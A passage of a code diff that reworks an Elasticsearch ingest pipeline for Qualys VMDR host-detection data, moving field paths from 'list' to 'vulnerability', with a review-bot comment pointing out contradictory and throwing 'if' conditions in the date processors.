rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS_FACTORS?.QDS_FACTOR != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS.QDS_FACTOR + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_FACTORS_QDS_FACTOR_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.qds_factors.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_3 - target_field: qualys_vmdr.asset_host_detection.list.qds_factors.text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_3 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text ignore_missing: true - foreach: - field: qualys_vmdr.asset_host_detection.list.qds_factors - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.qds_factors instanceof List + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.qds_factors instanceof List tag: foreach_rename_#text processor: rename: field: _ingest._value.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_4 + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_4 target_field: _ingest._value.text ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QDS - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_2 - target_field: qualys_vmdr.asset_host_detection.list.qds + if: 
ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.qds.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_#text_2 - target_field: qualys_vmdr.asset_host_detection.list.qds.text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_#text_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds.text ignore_missing: true - convert: - field: qualys_vmdr.asset_host_detection.list.PORT - target_field: qualys_vmdr.asset_host_detection.list.port - tag: convert_qualys_vmdr_asset_host_detection_list_PORT_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.PORT + target_field: qualys_vmdr.asset_host_detection.vulnerability.port + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_PORT_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.PORT != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.PORT != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.TIMES_FOUND - target_field: qualys_vmdr.asset_host_detection.list.times.found - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_FOUND_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + 
target_field: qualys_vmdr.asset_host_detection.vulnerability.times.found + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_FOUND_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_FOUND != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_FOUND != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.TIMES_REOPENED - target_field: qualys_vmdr.asset_host_detection.list.times.reopened - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_REOPENED_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.reopened + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_REOPENED_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_REOPENED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_REOPENED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.SEVERITY - target_field: qualys_vmdr.asset_host_detection.list.severity - tag: convert_qualys_vmdr_asset_host_detection_list_SEVERITY_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + target_field: 
qualys_vmdr.asset_host_detection.vulnerability.severity + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_SEVERITY_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.SEVERITY != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.SEVERITY != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_UPDATE_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_UPDATE_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.update_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_UPDATE_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_UPDATE_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime formats: - ISO8601 on_failure: 
@@ -1277,10 +1183,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_LAST_FIXED_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FIXED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.last.fixed_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FIXED_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FIXED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime
formats:
- ISO8601
on_failure:
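Review bot: The rewritten `if` on `date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FIXED_DATETIME_2` can never let the processor run: its first clause requires `vulnerability` to be null, while its third clause dereferences `ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME` without `?.`, so the processor is skipped when `vulnerability` is present and the condition throws rather than evaluating to false when it is absent but `list.LAST_FIXED_DATETIME` is set; the middle clause also still reads from `list`, which the rest of this change moves away from, so this looks like an incomplete search-and-replace of the old `list instanceof List` split. The same condition shape repeats in the LAST_TEST_DATETIME, LAST_PROCESSED_DATETIME, LAST_FOUND_DATETIME, LAST_REOPENED_DATETIME, FIRST_FOUND_DATETIME and FIRST_REOPENED_DATETIME hunks that follow. A `_1` date processor for `vulnerability.LAST_FIXED_DATETIME` guarded by `if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FIXED_DATETIME != null` already exists earlier in this diff, so these `_2` processors appear redundant and could be dropped; if they are meant to stay, the guard should be `if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.LAST_FIXED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME != ''`. As written, any document that reaches the throwing branch loses `last.fixed_datetime` (or the whole event, depending on how the pipeline-level `on_failure` treats a condition error), which is worth pinning with a pipeline test document that carries `vulnerability` as a single object.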
@@ -1288,10 +1194,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_LAST_TEST_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_TEST_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.last.test_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_TEST_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_TEST_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime
formats:
- ISO8601
on_failure:
@@ -1299,10 +1205,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_LAST_PROCESSED_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_PROCESSED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.last.processed_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_PROCESSED_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_PROCESSED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime
formats:
- ISO8601
on_failure:
@@ -1310,10 +1216,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_LAST_FOUND_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.last.found_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FOUND_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime
formats:
- ISO8601
on_failure:
@@ -1321,10 +1227,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_LAST_REOPENED_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.last.reopened_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_REOPENED_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime
formats:
- ISO8601
on_failure:
@@ -1332,10 +1238,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_FIRST_FOUND_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.first.found_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_FOUND_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime
formats:
- ISO8601
on_failure:
@@ -1343,10 +1249,10 @@ processors:
field: error.message
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- date:
- field: qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME
- tag: date_qualys_vmdr_asset_host_detection_list_FIRST_REOPENED_DATETIME_2
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME != ''
- target_field: qualys_vmdr.asset_host_detection.list.first.reopened_datetime
+ field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME
+ tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_REOPENED_DATETIME_2
+ if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.FIRST_REOPENED_DATETIME != ''
+ target_field: qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime
formats:
- ISO8601
on_failure:
@@ -1354,161 +1260,138 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: - field: qualys_vmdr.asset_host_detection.list.SSL - tag: rename_qualys_vmdr_asset_host_detection_list_SSL_2 - target_field: qualys_vmdr.asset_host_detection.list.ssl + field: qualys_vmdr.asset_host_detection.vulnerability.SSL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SSL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.ssl ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.TYPE - tag: rename_qualys_vmdr_asset_host_detection_list_TYPE_2 - target_field: qualys_vmdr.asset_host_detection.list.type + field: qualys_vmdr.asset_host_detection.vulnerability.TYPE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_TYPE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.type ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.STATUS - tag: rename_qualys_vmdr_asset_host_detection_list_STATUS_2 - target_field: qualys_vmdr.asset_host_detection.list.status + field: qualys_vmdr.asset_host_detection.vulnerability.STATUS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_STATUS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.status ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.RESULTS - tag: rename_qualys_vmdr_asset_host_detection_list_RESULTS_2 - target_field: qualys_vmdr.asset_host_detection.list.results + field: qualys_vmdr.asset_host_detection.vulnerability.RESULTS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_RESULTS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.results ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QID - tag: rename_qualys_vmdr_asset_host_detection_list_QID_2 - 
target_field: qualys_vmdr.asset_host_detection.list.qid + field: qualys_vmdr.asset_host_detection.vulnerability.QID + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QID_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qid ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.PROTOCOL - tag: rename_qualys_vmdr_asset_host_detection_list_PROTOCOL_2 - target_field: qualys_vmdr.asset_host_detection.list.protocol + field: qualys_vmdr.asset_host_detection.vulnerability.PROTOCOL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_PROTOCOL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.protocol ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.FQDN - tag: rename_qualys_vmdr_asset_host_detection_list_FQDN_2 - target_field: qualys_vmdr.asset_host_detection.list.fqdn + field: qualys_vmdr.asset_host_detection.vulnerability.FQDN + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_FQDN_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.fqdn ignore_missing: true - append: field: related.hosts - tag: append_qualys_vmdr_asset_host_detection_list_fqdn_into_related_hosts_2 - value: '{{{qualys_vmdr.asset_host_detection.list.fqdn}}}' + tag: append_qualys_vmdr_asset_host_detection_vulnerability_fqdn_into_related_hosts_2 + value: '{{{qualys_vmdr.asset_host_detection.vulnerability.fqdn}}}' allow_duplicates: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.fqdn != null + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.fqdn != null - rename: - field: qualys_vmdr.asset_host_detection.list.INSTANCE - tag: rename_qualys_vmdr_asset_host_detection_list_INSTANCE_2 - target_field: qualys_vmdr.asset_host_detection.list.instance + field: qualys_vmdr.asset_host_detection.vulnerability.INSTANCE + tag: 
rename_qualys_vmdr_asset_host_detection_vulnerability_INSTANCE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.instance ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_SERVICE_2 - target_field: qualys_vmdr.asset_host_detection.list.service + field: qualys_vmdr.asset_host_detection.vulnerability.SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_SERVICE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.service ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_RUNNING_KERNEL - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_KERNEL_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.running.kernel + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_KERNEL + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_KERNEL_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_RUNNING_SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_SERVICE_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.running.service + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_RUNNING_SERVICE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_RUNNING_SERVICE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.running.service ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.AFFECT_EXPLOITABLE_CONFIG - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_EXPLOITABLE_CONFIG_2 - target_field: qualys_vmdr.asset_host_detection.list.affect.exploitable_config + field: qualys_vmdr.asset_host_detection.vulnerability.AFFECT_EXPLOITABLE_CONFIG + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_AFFECT_EXPLOITABLE_CONFIG_2 + 
target_field: qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.ASSET_CVE - tag: rename_qualys_vmdr_asset_host_detection_list_ASSET_CVE_2 - target_field: qualys_vmdr.asset_host_detection.list.asset_cve + field: qualys_vmdr.asset_host_detection.vulnerability.ASSET_CVE + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_ASSET_CVE_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.asset_cve ignore_missing: true - set: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED - tag: set_qualys_vmdr_asset_host_detection_list_IS_DISABLED_true + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_true value: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '1' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '1' - set: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED - tag: set_qualys_vmdr_asset_host_detection_list_IS_DISABLED_false + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_DISABLED_false value: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '0' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED == '0' - convert: - field: qualys_vmdr.asset_host_detection.list.IS_DISABLED + field: qualys_vmdr.asset_host_detection.vulnerability.IS_DISABLED tag: convert_IS_DISABLED_to_boolean - target_field: qualys_vmdr.asset_host_detection.list.is_disabled + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_disabled type: boolean 
ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_DISABLED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED - tag: set_qualys_vmdr_asset_host_detection_list_IS_IGNORED_true + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_true value: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '1' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '1' - set: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED - tag: set_qualys_vmdr_asset_host_detection_list_IS_IGNORED_false + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED + tag: set_qualys_vmdr_asset_host_detection_vulnerability_IS_IGNORED_false value: false - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '0' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED == '0' - convert: - field: qualys_vmdr.asset_host_detection.list.IS_IGNORED + field: qualys_vmdr.asset_host_detection.vulnerability.IS_IGNORED tag: convert_IS_IGNORED_to_boolean - target_field: qualys_vmdr.asset_host_detection.list.is_ignored + target_field: qualys_vmdr.asset_host_detection.vulnerability.is_ignored type: boolean ignore_missing: true 
- if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.IS_IGNORED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_remove_ingest_value_fields - processor: - remove: - field: - - _ingest._value.LAST_UPDATE_DATETIME - - _ingest._value.LAST_FIXED_DATETIME - - _ingest._value.LAST_TEST_DATETIME - - _ingest._value.LAST_PROCESSED_DATETIME - - _ingest._value.FIRST_FOUND_DATETIME - - _ingest._value.FIRST_REOPENED_DATETIME - - _ingest._value.LAST_FOUND_DATETIME - - _ingest._value.LAST_REOPENED_DATETIME - - _ingest._value.SEVERITY - - _ingest._value.TIMES_FOUND - - _ingest._value.TIMES_REOPENED - - _ingest._value.PORT - - _ingest._value.QDS_FACTORS - - _ingest._value.IS_DISABLED - - _ingest._value.IS_IGNORED - tag: remove_qualys_vmdr_asset_host_detection_list_fields - ignore_missing: true - remove: tag: remove_json field: - json - message - - qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME - - qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME - - qualys_vmdr.asset_host_detection.list.IS_DISABLED - - qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME - - qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME - - qualys_vmdr.asset_host_detection.list.PORT - - 
